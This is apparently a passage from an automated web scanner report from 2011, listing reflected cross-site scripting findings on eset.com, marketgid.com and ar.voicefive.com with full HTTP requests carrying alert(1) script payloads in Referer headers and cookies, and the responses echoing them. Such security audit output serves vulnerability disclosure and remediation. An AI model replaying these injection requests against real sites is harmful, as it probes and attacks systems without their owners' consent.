This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 15:18:23 GMT
X-Varnish: 555657802
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.52. http://www.eset.com/us/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 631c6"-alert(1)-"5990df6aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26742
Date: Mon, 25 Apr 2011 15:20:14 GMT
X-Varnish: 555663552
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.53. http://www.eset.com/us/business/products [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/products

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 13:02:15 GMT
X-Varnish: 1310986158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.58. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8efb9<script>alert(1)</script>2ae95f37538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935
Referer: http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 48806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538</div>
...[SNIP]...

5.59. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1146c<script>alert(1)</script>154e165be29 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=11146c<script>alert(1)</script>154e165be29; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:17 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11146c<script>alert(1)</script>154e165be29', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.60. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 384b1<script>alert(1)</script>9c302d4a2ba was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:21 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

5.61. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f1285<script>alert(1)</script>7568065879e was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:32 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741412; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.62. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a6378<script>alert(1)</script>96b3feedbdd was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:29 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741409; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.63. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload dedf1<script>alert(1)</script>6a1a09355da was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
